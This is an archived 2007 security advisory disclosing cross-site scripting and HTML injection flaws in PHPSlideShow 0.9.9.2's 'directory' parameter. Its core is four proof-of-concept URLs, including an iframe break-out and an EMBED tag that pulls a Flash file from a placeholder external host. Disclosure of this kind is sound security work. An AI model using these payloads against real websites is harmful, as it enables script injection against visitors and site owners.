Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  Gekko <=0.8.2 (temp directory) Path Disclosure

  Liferay Enterprise Portal multiple XSS

  PHPkit 1.6.1 (include.
php?path=) Remote File Inclusion

  Eurologon CMS Multiple SQL Injection

From:morin.josh_(at)_gmail.com <morin.josh_(at)_gmail.com>
Date:29.11.2007
Subject:PHPSlideShow XSS Update

Vendor Site: http://www.zinkwazi.com/wp/scripts/
Version affected: 0.9.9.2
URL:http://www.example.com/scripts/demo/phpslideshow.php?directory=photos

BID ref: 26576 By Jose Luis Gуngora Fernбndez

PHPSlideShow is also susceptible the following inputs:

1.http
://www.yoursite.com/scripts/demo/phpslideshow.php?directory=
"><ifr
ame>

2.http
://www.yoursite.com/scripts/demo/phpslideshow.php?directory=
<html><f
ont color="Red"><b>Pwned</b></font></html>

3.http://www.yoursite.com/scripts/demo/phpslideshow.php?directory=<EMBED SRC="http://site.com/xss.swf"

4.
http://www.yoursite.com/scripts/demo/phpslideshow.php?directory=FORM%20ACTION
=%22search.php%22%20METHOD=%22GET%22%3E


Discovered by: Joshua Morin

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru